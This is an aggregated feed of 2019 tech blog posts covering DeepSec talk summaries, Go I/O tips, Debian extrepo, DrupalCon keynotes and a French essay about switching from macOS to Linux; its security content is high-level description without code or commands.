After a welcomed coffee break, I came back to the same track to attend “Mastering AWS pen testing and methodology” by Ankit Giri. The idea behind this talk is to get a better idea about how to pentest an AWS environment.

The talk was full of tips & tricks but also references to tools. The idea is to start by enumerating the AWS accounts used by the platform as well as the services. To achieve this, you can use aws-inventory. Then check for CloudWatch, CloudTrail of BillingAlerts. Check the configuration of services being used. Make notes of services interacting with each other. S3 buckets are, of course, juicy targets. Another tool presented was S3SCanner. Then keep an eye on the IAM: how accounts are managed, what are the access rights, keys, roles. In this case, PMApper can be useful. EV2 virtual systems must be reviewed to find open ports, ingress/egress traffic, and their security groups! If you are interested in testing AWS environments, have a look at this arsenal. To complete the presentation, a demo of prowler was performed by Ankit.

Then Yuri Chemerkin presented “Still Secure. We Empower What We Harden Because We Can Conceal“. To be honest with you, I did not understand the goal of the presentation, the speaker was not very engaging and many content was in Russian… Apparently, while discussing with other people who attended the talk, it was related to the leak of information from many tools and how to use them in security testing…

The next one was much more interesting: “Android Malware Adventures: Analyzing Samples and Breaking into C&C” presented by Kürşat Oğuzhan Akıncı & Mert Can Coşkuner. The talk covered the hunt for malware in the mobile apps ecosystem, mainly Android (>70% of new malware are targeting Android phones). Even if Google implemented checks for all apps submitted to the Play store, the solution is not bullet-proof and, like on Windows systems, malware developers have techniques to bypass sandbox detection… They explained how they spotted a campaign targetting Turkey. They analyzed the malware and successfully exploited the C2 server which was vulnerable to:

  • Directory listing
  • Lack of encryption keys
  • Password found in source code
  • Weak upload feature, they uploaded a webshell
  • SQLi
  • Stored XSS

In the end, they uncovered the campaign, they hacked back (with proper authorization!), they restored stolen data and prevented further incidents. Eight threat actors were arrested.

My next choice was again a presentation about the analysis of a known campaign: “The Turtle Gone Ninja – Investigation of an Unusual Crypto-Mining Campaign” presented by Ophir Harpaz, Daniel Goldberg.


The campaign was “NanshOu” and it’s not a classic one. Ophir & Daniel gave many technical details about the malware, how it infected thousands of MSSQL servers to deploy a crypto-miner. Why servers? Because they require less interaction, they have better uptime, they have lot of resources and are maintained by poor IT teams ;-). The infection path was: scanning for MSSQL servers, brute force them, enable execution of code (via xp-cmdshell()), drop files and execute them.


Then, Tim Berghoff and Hauke Gierow presented “The Daily Malware Grind” – Looking Beyond the Cybers“. They performed a review of the threat landscape, ransomware, crypto-miners, RATs, etc… Interesting fact: old malware remains active.


Lior Yaari talked about a hot topic these days: “The Future Is Here – Modern Attack Surface On Automotive“. Do you know that IDS are coming to connected cars automotive today? It’s a fact, cars are ultra-connected today and it will be worse in the future. If, in the year 2005, cars had an AUX connected and USB ports, today they have GPS, 4G, BT, WiFi and a lot of telemetrics data sent to the manufacturer! By 2025, cars will be part of clouds, be connected to PLC, talk to electric chargers, gas stations, etc. Instead of using ODB2 connections, we will use regular apps to interact with them. Lior gave multiple examples of potential issues that people will face with their connected cards. A great topic!


To close the first day, I attended “Practical Security Awareness – Lessons Learnt and Best Practices” by Stefan Schumacher. He explained in detail why awareness trainings are not always successful.

It’s over for today! Stay tuned for the next wrap-up tomorrow! I’m expecting a lot from some presentations!

[The post DeepSec 2019 Wrap-Up Day #1 has been first published on /dev/random]

November 27, 2019

There’s an annoying little bug in VirtualBox that can cause your network config in the VM to become invalid after a reboot of your host Mac.
There’s an annoying little bug in VirtualBox that can cause your network config in the VM to become invalid after a reboot of your host Mac.
I’ve got a Mac Mini at home to act as a server & desktop. On it there are several Virtual Box VMs, among which a a pihole to block unwanted requests via DNS.

November 25, 2019

I’ve really come to appreciate the elegance in the io abstractions in Go. The seemingly simple patterns of io.Reader and io.Writer open up a world of easily composable data pipelines.

Need to add compression? Just wrap the Writer with a gzip.Writer, etc.

But there are some subtleties to be aware off, that might bite you.

Let’s have a look at the description of io.Reader.Read():

Read(p []byte) (n int, err error)

Read reads up to len(p) bytes into p. It returns the number of bytes read (0 <= n <= len(p)) and any error encountered. Even if Read returns n < len(p), it may use all of p as scratch space during the call. If some data is available but not len(p) bytes, Read conventionally returns what is available instead of waiting for more.

This is fairly straightforward. You call Read() with a byte slice, which it may fill up. The key point here being may. Most IO sources (e.g. a file) will generally read the full buffer, until you reach the end of the file.

But not all of them. For instance, a gzip.Writer tends to do incomplete reads, requiring multiple Read() calls.

Recommendation: If you need to read a buffer in full, use io.ReadFull() instead of Read().

When Read encounters an error or end-of-file condition after successfully reading n > 0 bytes, it returns the number of bytes read. It may return the (non-nil) error from the same call or return the error (and n == 0) from a subsequent call. An instance of this general case is that a Reader returning a non-zero number of bytes at the end of the input stream may return either err == EOF or err == nil. The next Read should return 0, EOF.

Callers should always process the n > 0 bytes returned before considering the error err. Doing so correctly handles I/O errors that happen after reading some bytes and also both of the allowed EOF behaviors.

This means it’s perfectly legal to return both n (and thus read a number of bytes) and an error at the same time.

It also means that the standard pattern of immediately checking for an error is wrong:

// Don't do this
n, err := in.Read(buf)
if err != nil {
    // Handle err
}
// Do something with n and buf

Always process n / buf first, then check for the presence of an error.

Implementations of Read are discouraged from returning a zero byte count with a nil error, except when len(p) == 0. Callers should treat a return of 0 and nil as indicating that nothing happened; in particular it does not indicate EOF.

The important take-away here: always check for err == io.EOF, some implementations might give you an empty read even if there is still data to come.


Running into either of these corner cases is generally rare, since most IO sources are quite well-behaved. But being aware of the corner cases will save you a massive amount of debugging once you do run into them.


Comments | More on rocketeer.be | @rubenv on Twitter

I published the following diary on isc.sans.edu: “My Little DoH Setup“:

“DoH”, this 3-letters acronym is a buzzword on the Internet in 2019! It has been implemented in Firefox, Microsoft announced that Windows will support it soon. They are pro & con about encrypting DNS requests in  HTTPS but it’s not the goal of this diary to restart the debate. In a previous diary, he explained how to prevent DoH to be used by Firefox but, this time, I’ll play on the other side and explain to you how to implement it in a way to keep control of your DNS traffic (read: how to keep an eye on DNS request performed by users and systems)… [Read more]

[The post [SANS ISC] My Little DoH Setup has been first published on /dev/random]

I’ve been using the Caddy webserver for all my projects lately. Here’s my current default config for a Laravel project.

November 22, 2019

I published the following diary on isc.sans.edu: “Abusing Web Filters Misconfiguration for Reconnaissance“:

Yesterday, an interesting incident was detected while working at a customer SOC. They use a “next-generation” firewall that implements a web filter based on categories. This is common in many organizations today: Users’ web traffic is allowed/denied based on an URL categorization database (like “adult content”, “hacking”, “gambling”, …). How was it detected? [Read more]

[The post [SANS ISC] Abusing Web Filters Misconfiguration for Reconnaissance has been first published on /dev/random]

November 21, 2019

If you have a Laravel project, you might be surprised to find your routes are probably available on a number of different URLs.
I ran into this error when I tried any git operation (like git clone and git pull) on a Mac.

November 20, 2019

It’s beginning to look a lot like Christmas ladies & gentlemen and I’m planning on putting Autoptimize 2.6 nicely wrapped up under your Christmas tree.

The new version comes with the following changes;

  • New: Autoptimize can be configured at network level or at individual site-level when on multisite.
  • Extra: new option to specify what resources need to be preloaded.
  • Extra: add `display=swap` to Autoptimized (CSS-based) Google Fonts.
  • Images: support for lazyloading of background-images when set in the inline style attribute of a div.
  • Images: updated to lazysizes 5.1.2 (5.2 is in beta now, might be integrated in AO26 if released in time).
  • CSS/ JS: no longer add type attributes to Autoptimized resources.
  • Improvement: cache clearing now also integrates with Kinsta, WP-Optimize & Nginx helper.
  • Added “Critical CSS” tab to highlight the criticalcss.com integration, which will be fully included in Autoptimize 2.7.
  • Large batch of misc. smaller improvements & fixes, more info in the [GitHub commit log](https://github.com/futtta/autoptimize/commits/beta).

So in order to make this the smoothest release possible I would like the beta to be downloaded and tested by as many people as possible, including you!

Any issue/ question/ bug can be reported here as a reply or if a bug and if you’re more technically inclined over at Github as an issue. Looking forward to your feedback!

We had an interesting security report for our Oh Dear monitoring service. An attacker could load a specific URL and trigger a 404 page in which they controlled the output.

November 19, 2019

My announcement the other day has resulted in a small amount of feedback already (through various channels), and a few extra repositories to be added. There was, however, enough feedback (and the manner of it unstructured enough) that I think it's time for a bit of a follow-up:

  • If you have any ideas about future directions this should take, then thank you! Please file them as issues against the extrepo-data repository, using the wishlist tag (if appropriate).
  • If you have a repository that you'd like to see added, awesome! Ideally you would just file a merge request; Vincent Bernat already did so, and I merged it this morning. If you can't figure out how to do so, then please file a bug with the information needed for the repository (deb URI, gpg key signing the repository, description of what type of software the repository contains, supported suites and components), and preferably also pointing to the gap in the documentation that makes it hard for you to understand, so I can improve ;-)
  • One questioner asked why we don't put third-party repository metadata into .deb packages, and ship them that way. The reason for this is that the Debian archive doesn't change after release, which is the point where most external repositories would be updated for the new release. As such, while it might be useful to have something like that in certain cases (e.g., the (now-defunct) pkg-mozilla-archive-keyring package follows this scheme), it can't work in all cases. In contrast, extrepo is designed to be updateable after the release of a particular Debian suite.
I’ve been moving some projects around lately and found myself in need of a weird thing I hadn’t considered before: specifying a specific SSH private key for running things like git clone or git pull.

November 18, 2019

It took a little longer than expected, but we are happy to announce the list of accepted stands for FOSDEM 2020. New this year is that some stands will switch between Saturday and Sunday, so we can give more projects the opportunity to present themselves to the community. There will be stands in the K, H and AW building, but who will be where will be announced closer to the event. We hope to see you all in February! Entire Conference Stand CentOS Debian Gentoo Linux FreeBSD Fedora Project openSUSE openMandriva illumos Automative Grade Linux Coreboot + Flashrom +舰

November 17, 2019

All Drupal core initiatives with leads attending DrupalCon Amsterdam took part in an experimental PechaKucha-style keynote format (up to 15 slides each, 20 seconds per slide):

Drupal 8’s continuous innovation cycle resulted in amazing improvements that made today’s Drupal stand out far above Drupal 8.0.0 as originally released. Drupal core initiatives played a huge role in making that transformation happen. In this keynote, various initiative leads will take turns to highlight new capabilities, challenges they faced on the way and other stories from core development.

I represented the API-First Initiative and chose to keep it as short and powerful as possible by only using four of my five allowed minutes. I focused on the human side, with cross-company collaboration across timezones to get JSON:API into Drupal 8.7 core, how we invited community feedback to make it even better in the upcoming Drupal 8.8 release, and how the ecosystem around JSON:API is growing quickly!

It was a very interesting experience to have ten people together on stage, with nearly zero room for improvisation. I think it worked pretty well — it definitely forces a much more focused delivery! Huge thanks to Gábor Hojtsy, who was not on stage but did all the behind-the-scenes coordination.

Extra information: 
DrupalCon Amsterdam
Amsterdam, Netherlands

Debian ships with a lot of packages. This allows our users to easily install software without too much effort -- just run apt-get install foo, and foo gets installed.

However, Debian does not ship with everything, and for that reason there sometimes are things that are not installable with just the Debian repositories. Examples include:

  • Software that is not (yet) packaged for Debian
  • A repository for software that is in Debian, but for the bleeding-edge version of that software (e.g., maintained by upstream, or maintained by the Debian packager for that software)
  • Software that is not DFSG-free, and cannot be included into Debian's non-free repository due to licensing issues, but that can freely be installed by Debian users.

In order to enable and use such repositories on a Debian system, a user currently has to perform some actions that may be insecure:

  • Some repositories provide a link to a repository and a key, and expect the user to perform all actions to enable that repository manually. This works, but mistakes are easy to make (especially for beginners), and therefore it is not ideal.
  • Some repositories provide a script to enable the repository, which must be run as root. Such scripts are not signed when run. In other words, we expect users to run untrusted code downloaded from the Internet, when everywhere else we tell people that doing so is a bad idea.
  • Some repositories provide a single .deb file that can be installed, and which enables the necessary repositories in the apt configuration. Since, in contrast to RPM files, Debian packages are not signed, this means that the configuration is not enabled securely.

While there is a tool to enable package signatures in Debian packages, the dpkg tool does not enforce the existence of such signatures, and therefore it is possible for an attacker to replace the (signed) .deb file with an unsigned variant, bypassing the whole signature.

In an effort to remedy this whole situation, I looked at creating extrepo, a package that would download repository metadata from a special-purpose repository, verify the signatures placed on that metadata, and if everything matches, enable the repository by creating the necessary apt configuration files.

This should allow users to enable external repository "foo" by running extrepo enable foo, rather than downloading a script from foo's website and executing it as root -- or other similarly insecure options.

The extrepo package has been uploaded to Debian; and so once NEW processing has finished, will be available in Debian unstable.

I might upload it to backports too if no issues are found, but that won't be an immediate thing.

November 15, 2019

I want to show you how I use a tool called goaccess to do some quick analysis of access logs on webservers.

November 12, 2019

I just finished the last bits of migration for this site. It involved moving my podcasts from the podcast.

November 09, 2019

Here’s a quick tip on how to combine multiple separate videos into a single one, using ffmpeg.

November 08, 2019

I published the following diary on isc.sans.edu: “Microsoft Apps Diverted from Their Main Use“:

This week, the CERT.eu organized its yearly conference in Brussels. Across many interesting presentations, one of them covered what they called the “cat’n’mouse” game that Blue and Red teams are playing continuously. When the Blue team has detected an attack technique, they write a rule or implement a new control to detect or block it. Then, the Red team has to find an alternative attack path, and so one… A classic example is the detection of malicious via parent/child process relations. It’s quite common to implement the following simple rule (in Sigma format)… [Read more]

[The post [SANS ISC] Microsoft Apps Diverted from Their Main Use has been first published on /dev/random]

If you run a Laravel application purely as a headless API, you can benefit from disabling the HTTP sessions.

November 07, 2019

Macron. Niet praten. Maar doen.

Waar Frankrijk mee kan beginnen is hun legertop op te dragen te gaan praten met het Duitse leger. Jullie kunnen ook eens kijken hoe het Belgische en het Nederlandse leger een aantal taken onderling reeds verdelen.

Wat er in ieder geval zal moeten komen is een extreme vorm van funding. Dat zal vermoedelijk niet kunnen met bijdragen vanuit de lidstaten. Dus laat de ECB het geld gewoon bijdrukken. Dat zal misschien meteen de EURO inflatie in gang zetten. Dat willen alle EU economen toch. Niet?

Over twintig jaar is de EU de meest innoverende regio in de wereld. Met spitstechnologie gedreven door massale EU defensie uitgaven. Een beetje zoals wat DARPA voor de VS doet. Niets verkeerd mee.

Doen.

ps. Je kan al beginnen met dit door het Duitse deepl te gooien als je een Franse vertaling wil.

November 06, 2019

It took a bit longer than I expected but I’m happy to say I’ve migrated this website from WordPress to Hugo and introduced a new layout.

November 05, 2019

Last week, many Drupalists came together for Drupalcon Amsterdam.

As a matter of tradition, I presented my State of Drupal keynote. You can watch a recording of my keynote (starting at 20:44 minutes), or download a copy of my slides (149 MB).

Drupal 8 innovation update

I kicked off my keynote with an update on Drupal 8. Drupal 8.8 is expected to ship on December 4th, and will come with many exciting improvements.

Drupal 8.7 shipped with a Media Library to allow editors to reuse images, videos and other media assets. In Drupal 8.8, Media Library has been marked as stable, and features a way to easily embed media assets using a WYSIWYG text editor.

I'm even more proud to say that Drupal has never looked better, nor been more accessible. I showed our progress on Claro, a new administration UI for Drupal. Once Claro is stable, Drupal will look more modern and appealing out-of-the-box.

The Composer Initiative has also made significant progress. Drupal 8.8 will be the first Drupal release with proper, official support for Composer out-of-the-box. Composer helps solve the problem of Drupal being difficult to install and update. With Composer, developers can update Drupal in one step, as Composer will take care of updating all the dependencies (e.g. third party code).

What is better than one-step updates? Zero-step updates. We also showed progress on the Automated Updates Initiative.

Finally, Drupal 8.8 marks significant progress with our API-first Initiative, with several new improvements to JSON:API support in the contributed space, including an interactive query builder called JSON:API Explorer. This work solidifies Drupal's leadership position as a leading headless or decoupled solution.

Drupal 9 will be the easiest major update

A couple stares off into the distant sunrise, which has a '9' imposed on the rising sun.

Next, I gave an update on Drupal 9, as we're just eight months from the target release date. We have been working hard to make Drupal 9 the easiest major update in the last decade. In my keynote at 42:25, I showed how to upgrade your site to Drupal 9.0.0's development release.

Drupal 9 product strategy

I am proud of all the progress we made on Drupal 8. Nevertheless, it's also time to start thinking about our strategic priorities for Drupal 9. With that in mind, I proposed four strategic tracks for Drupal 9 (and three initial initiatives):

A mountain with a Drupal 9 flag at the top. Four strategic product tracks lead to the summit.

Strategic track 1: reduce cost and effort

Users want site development to be low-cost and zero-maintenance. As a result, we'll need to continue to focus on initiatives such as automated updates, configuration management, and more.

Strategic track 2: prioritizing the beginner experience

As we saw in a survey Acquia's UX team conducted, most people have a relatively poor initial impression of Drupal, though if they stick with Drupal long enough, their impression of Drupal grows significantly over time. This unlike any of its competitors, whose impression decreases as experience is gained. Drupal 9 should focus on attracting new users, and decreasing beginners' barriers to entry so they can fall in love with Drupal much sooner.

A graph that shows how Drupal is perceived by beginners, intermediate users and expert users.Beginners struggle with Drupal while experts love Drupal.
A graph that shows how Drupal, WordPress, AEM and Sitecore are perceived by beginners, intermediate users and experts.Drupal's sentiment curve goes in the opposite direction of WordPress', AEM's and Sitecore's. This presents both a big challenge and opportunity for Drupal.

We also officially launched the first initiative on this track; a new front-end theme for Drupal called "Olivero". This new default theme will give new users a much better first impression of Drupal, as well as reflect the modern backend that Drupal sports under the hood.

Strategic track 3: drive the Open Web

As you may know, 1 out of 40 websites run on Drupal. With that comes a responsibility to help drive the future of the Open Web. By 2022-2025, 4 billion new people will join the internet. We want all people to have access to the Open Web, and as a result should focus on accessibility, inclusiveness, security, privacy, and interoperability.

A person dressed in a space suit is headed towards a colorful vortex with a glowing Druplicon at the center.

Strategic track 4: be the best structured data engine

A slide that makes the point that Drupal needs to manage more diverse content and integrate with more different platforms.

We've already seen the beginnings of a content explosion, and will experience 300 billion new devices coming online by 2030. By continuing to make Drupal a better and better content repository with a flexible API, we'll be ready for a future with more content, more integrations, more devices, and more channels.

An overview of the four proposed Drupal 9 strategic product tracks

Over the next six months, we'll be opening up these proposed tracks to the community for discussion, and introducing surveys to define the 10 inaugural initiatives for Drupal 9. So far the feedback at DrupalCon Amsterdam has been very positive, but I'm looking forward to much more feedback!

Growing sponsored contributions

In a previous blog post, Balancing Makers and Takers to scale and sustain Open Source, I covered a number of topics related to organizational contribution. Around 1:19:44, my keynote goes into more details, including interviews with several prominent business owners and corporate contributors in the Drupal community.

You can find the different interview snippet belows:

  • Baddy Sonja Breidert, co-founder of 1xINTERNET, on why it is important to help convert Takers become Makers.
  • Tiffany Farriss, CEO of Palantir, on what it would take for her organization to contribute substantially more to Drupal.
  • Mike Lamb, Vice President of Global Digital Platforms at Pfizer, announcing that we are establishing the Contribution Recognition Committee to govern and improve Drupal's contribution credit system.

Thank you

Thank you to everyone who attended Drupalcon Amsterdam and contributed to the event's success. I'm always amazed by the vibrant community that makes Drupal so unique. I'm proud to showcase the impressive work of contributors in my presentations, and congratulate all of the hardworking people that are crucial to building Drupal 8 and 9 behind the scenes. I'm excited to continue to celebrate our work and friendships at future events.

A word cloud of all the individuals who contributed to Drupal 8.8.Thanks to the 641 individuals who worked on Drupal 8.8 so far.
A word cloud of all the organizational contributors who contributed to Drupal 8.8.Thanks to the 243 different organizations who contributed to Drupal 8.8 to date.
I’ve just finished migrating this website from a WordPress to a statically generated site with Hugo.

November 04, 2019

Petite chronique d’un retour aux sources et à l’essentiel d’un libriste de cœur.

L’intoxication numérique n’est pas simplement liée à la consommation quotidienne de Facebook. Les outils que nous utilisons pour être « productifs » ont également un coût énorme sur notre énergie mentale. Comme le souligne Cal Newport dans ses livres Deep Work et Digital Minimalism, nous avons tendance à ne considérer que le bénéfice potentiel d’un outil, nonobstant les coûts. Ce qui nous mène forcément à la conclusion absurde qu’« avoir l’outil est mieux que de ne pas l’avoir du tout ».

Dans mon esprit, ce surplus de consommation numérique s’est cristallisé avec l’App Store d’Apple. À travers des jolies images et des jolies couleurs, l’App Store avait pour objectif de me faire installer une énième application qui me rendrait plus productif, une énième application certes très jolie, mais dans laquelle je devrais migrer mes données existantes avant d’apprendre à l’utiliser avant de recommencer avec une autre quelques mois plus tard.

Excédé également par la non-configurablité, mais également par les bugs de MacOS, j’ai décidé de regagner ma liberté, de retourner à mes amours. 5 ans de Mac étaient une belle expérience, mais fini de jouer, j’ai désormais envie de revenir aux choses sérieuses.

Plutôt que de tenter une migration app pour app, en trouvant une application équivalente à chacun de mes usages, j’en ai profité pour faire le tri, pour lister toutes les apps et services que j’utilisais afin de les réduire au minimum.

La philosophie

Si j’investis dans un nouveau laptop, la question principale à se poser est « pour en faire quoi ? ». On peut tout faire aujourd’hui avec un ordinateur. Mais quel est mon objectif principal outre faire tourner Linux ?

Dans mon cas, il est très simple : écrire. Que ce soit pour mes projets personnels ou professionnels, je ramène désormais tout à l’écriture (d’ailleurs, si vous cherchez un écrivain/scénariste/vulgarisateur/futurologue, je fais également du mercenariat).

Outre les incontournables mails et un navigateur web, tout ce qui n’est pas directement lié à l’écriture doit être considéré de trop. Je me suis octroyé un seul plaisir : la lecture des flux RSS.

Pour le reste, je m’interdis toute distraction sur ce nouvel ordinateur. Les réseaux sociaux et les médias seront même bloqués. L’idée est que mon cerveau comprenne instinctivement que ce laptop ne sait faire qu’une seule chose : servir de machine à écrire. Plutôt que de lutter en permanence contre la tentation de me distraire, je rends la distraction impossible sur une machine particulière.

Cela résout également pas mal de questions concernant la compatibilité avec tel ou tel logiciel vaguement dispensable. S’il n’est pas indispensable pour me faire écrire (et, au fond, rien n’est indispensable pour écrire dans un fichier Markdown), alors la question ne se pose pas : il n’a pas sa place sur ma machine..

Le laptop

Si Linux me manquait affreusement et que je ne risque pas de regretter une seule seconde MacOS, je ne peux pas en dire autant de la finesse, de la légèreté et de la qualité d’écran d’un macbook. 900 grammes sans ventilateur ni le moindre bruit, difficile de faire mieux.

Mon choix se porte finalement sur le Star Lite de Starlabs. 1,1kg, c’est un peu lourd, un peu plus épais avec un mauvais écran. Mais, avantage non négligeable, il coûte littéralement le quart du prix d’un macbook. À ce tarif, je ne m’attends pas à un miracle.

Je suis surpris cependant par l’aspect général. Pas de plastique, mais cette espèce d’aluminium qui semble très solide. Tellement solide qu’ouvrir le laptop requiert à chaque fois un véritable effort des deux mains. Une fois ouvert, l’écran est nettement moins bon, ultra-sensible aux reflets et bouge légèrement quand je tape au clavier. Le clavier, lui, est l’excellente surprise après des années sur un macbook : quel confort d’avoir de véritables touches ! Je regrette juste que les touches à droite soient fort petites, car, en Bépo, la touche la plus à droite est le W. Il m’arrive très régulièrement de taper un retour à la ligne au lieu d’un W. Mais je ne vais pas me plaindre : le macbook était devenu littéralement inutilisable à cause d’un bug, visiblement très répandu, qui déplace le curseur aléatoirement au cours de la frappe.

Niveau performances, je ne sais pas si c’est le matériel ou Linux, mais tout est parfaitement réactif dans i3. Le macbook consommait très souvent beaucoup de CPU, les sites étaient lents à ouvrir et Antidote était littéralement inutilisable. Rien de tout ça dans le Star Lite, je retrouve une expérience fluide et normale du web et je me réconcilie avec Antidote. Dans un Gnome-shell, c’est une autre histoire, spécialement avec le trackpad. Car le trackpad est une véritable catastrophe. De temps en temps, et je soupçonne que c’est lié à la charge CPU, il va se bloquer, devenir erratique ou très lent.

Mais j’ai décidé de vivre avec, car je souhaite utiliser de plus en plus le clavier. Le Star Lite dispose d’ailleurs d’une touche magique pour complètement désactiver le touchpad. J’adore !

Bref, le Star Lite est loin d’être parfait, mais il est petit, portable, relativement léger, résistant, assez performant pour mon usage minimal et pas cher. Bien que n’ayant pas de ventilateurs, il est cependant bruyant : la RAM cliquète comme sur un vieux desktop des années 90. Je croyais que ça n’existait plus… Ça et l’infernale diode blanche qui m’éblouit en permanence pour me dire que mon laptop est allumé !

Mon workflow de travail

Une conclusion s’est très vite imposée à mes yeux : je devais minimiser les différents stockages de mes données. Il m’est arrivé plus d’une fois de chercher un fichier dans Evernote alors qu’il était dans mon Dropbox ou dans Notions, de ne plus savoir exactement ce que j’avais installé sur ma machine ou de savoir que j’avais interagit avec un partenaire sur un projet, mais sans savoir si c’était sur Slack, Evernote, Google Drive ou par mail.

J’ai, ces dernières années, tenté de me débarrasser des fichiers, d’avoir tout dans Evernote ou tout autre service concurrent que je testais. Mais je réalise aujourd’hui que les mails et les fichiers sont deux piliers incontournables. Ils existeront toujours et je devrai toujours travailler avec. Du coup, comment ne pas ajouter d’autres piliers ?

C’est tout simple : je n’utiliserais désormais plus que des fichiers traditionnels organisés à ma façon. Finis les stacks, les notebooks, les notes. Si un logiciel ne me permet pas de gérer mes données dans des fichiers dans un format ouvert et une structure que je contrôle, je ne considère même pas son utilisation (exit donc Joplin ou Notable, qui sont pas mal mais forcent une structure de répertoires).

En partant du postulat que chaque projet est un répertoire, j’ai, après plusieurs essais et erreurs, fini par aboutir à la structure suivante en 5 répertoires très simples.

Archives : comme le nom l’indique, Archives contient tous les projets terminés ou abandonnés. À noter que, plutôt que de classer par « type », je considère tout comme un projet. Les photos de mon mariage, par exemple, sont dans un dossier « Mariage » qui contient également le PDF des invitations, le tableur de la liste d’invités et toutes les autres archives. C’est simple, mais il m’a fallu casser l’inclinaison à mettre les photos dans « Photos », les pdf dans « documents », etc.

inbox : un répertoire essentiellement vide qui contient les fichiers temporaires ou en transit. Un billet de train, un PDF à imprimer, un document téléchargé que je n’ai pas encore classé, etc.

Workbox : contient les projets en cours qui ne nécessitent pas une attention soutenue. Ce sont plutôt des projets en arrière-plan permanent. Par exemple, le dossier SPRL contenant tout ce qui est relatif à notre société est dans Workbox. Un dossier Aida4 contient tout ce qui est relatif au brevet d’apnée sur lequel je travaille pour le moment. Ma migration vers Linux ou ma recherche de laptop étaient également dans ce répertoire.

Frigobox : répertoire particulier, il contient tous les projets sur lesquels je souhaite m’investir, mais que je m’interdis de faire pour le moment pour éviter la dispersion. La relecture de Printeurs pour en faire un ebook digne de ce nom est par exemple dans Frigobox. Plusieurs billets de blog sont également là-dedans.

Focusbox : les projets sur lesquels je souhaite me concentrer. Quand je suis sur mon ordinateur, c’est dans ce répertoire que je dois être et travailler. Idéalement un et pas plus de 3 projets dans ce répertoire.

Ces 5 dossiers sont synchronisés grâce à Tresorit. J’ai également 3 autres dossiers qui ne sont pas sur Tresorit : Download, un répertoire pour tout ce qui est temporaire et qui peut être perdu, devel, un répertoire qui contient les dépôts git sur lesquels je travaille et Dropbox, pour avoir accès à certaines applications qui nécessitent Dropbox (dans mon cas, c’est la synchronisation avec le Freewrite).

Depuis quelques mois, j’utilise cette organisation et je suis abasourdi par son efficacité. Je ne cherche plus un fichier, j’ai toujours sous la main ce dont j’ai besoin et les fichiers ne s’accumulent pas dans mon HOME.

Mon HOME. Tout simplement.

Logiciels

J’ai insisté sur mon désir de simplification. Comme je cherchais à passer un un tiling window manager, afin de faire tout au clavier et de ne plus avoir de bureau, je suis tombé sur Regolith Linux, un projet qui est exactement ce dont j’avais besoin, à savoir une version d’Ubuntu où le bureau GNOME a été remplacé par i3, mais en gardant certains avantages de GNOME et en étant très accessible aux débutants grâce à un affichage facile des raccourcis clavier. Un bonheur !

Hormis les traditionnels Firefox, Geary (pour les mails) et Feedreader (pour les RSS), le seul logiciel important installé sur ma machine est Zettlr.

Zettlr, combiné à mon organisation en répertoires, a réussi à remplacer pas moins de 4 logiciels macOS. Le fait que tous les répertoires de mon HOME soient dans Zettlr est primordial. Tout semble soudain incroyablement facile et simple.

Zettlr remplace tout d’abord Ulysses comme logiciel d’écriture et d’organisation de mes textes. Il remplace également Evernote comme logiciel de prise de notes. D’ailleurs, je n’ai jamais réussi de manière satisfaisante à trouver un workflow entre Evernote et Ulysses. Mais il remplace également DayOne. J’ai en effet décidé de transformer mon journal personnel en simples fichiers markdown (voir mon script d’export de DayOne vers Markdown). Et, last but not least, il remplace Things, le dernier gestionnaire de todo que j’avais testé.

En effet, plutôt que d’avoir des todos dans un logiciel séparé, je me contente désormais d’écrire le mot magique « TODO » dans le fichier du projet concerné. Bon, je l’avoue, j’utilise également un carnet papier (mais, de toute façon, je jonglais entre différents carnets papier, mon gestionnaire de todo, mes notes Evernote).

Zettlr ne remplace parfaitement aucun de ces logiciels. Mais, dans une volonté de minimalisme, j’ai décidé d’accepter cette « dégradation », de perdre en fonctionnalités. Je me rends compte, après plus d’un mois à ce rythme, que c’est extrêmement libérateur pour l’esprit. Je courais après la solution ultime alors que, fondamentalement, le coût mental de n’importe quelle solution est bien plus élevé que le bénéfice éventuel.

Tout cela m’a même motivé de me remettre à Vim grâce au livre de Vincent Jousse « Vim pour les humains ». J’essaie de voir si je pourrais répliquer, dans Vim, les fonctionnalités de Zettlr, à savoir la navigation par projet, le mode distraction-free, la création simple d’un fichier dans un projet. Je réfléchis également à passer mes mails et mes flux RSS en ligne de commande, pour utiliser les raccourcis Vim. Chantier en cours, notamment en terme de lisibilité de ma console.

Le retour à la maison

Après 5 années sous MacOS, je ressens mon retour sous Ubuntu comme un véritable retour à la maison. Je n’ai jamais été chez moi sur un Mac. J’ai besoin que mes outils soient alignés avec mes valeurs. Je fais partie de la famille du libre, c’est identitaire chez moi et je dois l’accepter. J’ai trahi mes idéaux par semi-obligation professionnelle, confort et curiosité, mais je me rends compte que cela ne me plait pas.

Je repense à tous ces outils, parfois excellents, qui ont été créés, qui sont devenus une startup avant de disparaitre. Au lieu de créer ma startup, j’ai créé avec mon ami Bertrand le logiciel libre Getting Things GNOME. Je lui ai consacré plusieurs années de ma vie qui s’est traduit en un certain succès d’estime. Contrairement à une startup, je n’en ai jamais tiré le moindre profit financier, mais, aujourd’hui, je suis fier de constater que le logiciel possède encore des utilisateurs qui tentent de le faire revivre. C’est toute la différence entre le propriétaire et le libre : le libre a une chance de survivre à ses fondateurs. Mais les fondateurs, eux, n’ont aucune chance d’en tirer de gros bénéfices.

Aujourd’hui, ce que je cherche dans le libre c’est avant tout la liberté, la simplification. Une simplification dont Ubuntu s’éloigne à mes yeux beaucoup trop, notamment avec son système Snap qui me fait trop penser à l’App Store. Je lorgne pour revenir à mon premier amour libriste, Debian.

En attendant que Regolith fonctionne sous Debian, je liste tout ce que j’ai installé qui n’est pas disponible pour Debian. Mon objectif est de garder cette liste la plus courte possible. Je vous la partage.

En libre, et qui pourrait donc se retrouve dans Debian : Regolith, Zettlr, starlabs-power (optimisation pour la batterie de mon laptop), Signal, Protonvpn-cli, bitwarden et f.lux (redshift ne m’a pas vraiment satisfait). Si vous connaissez un développeur Debian, je serais heureux de donner un coup de main pour faire entrer Zettlr dans l’OS universel !

En non-libre : Tresorit, Protonmail-bridge, Antidote, Minetime (pas moyen de trouver un calendrier libre correct), Dropbox, Remarkable.

Pour les services non-libres, j’utilise également Adguard (sous forme d’extension Firefox), Brain.fm (j’adore ce service qui me simplifie la vie au point de ne pas avoir à choisir quelle musique écouter pour me concentrer).

C’est à la fois beaucoup et pas grand-chose quand je vois tous les services que j’ai résiliés durant ces derniers mois.

Les petits problèmes

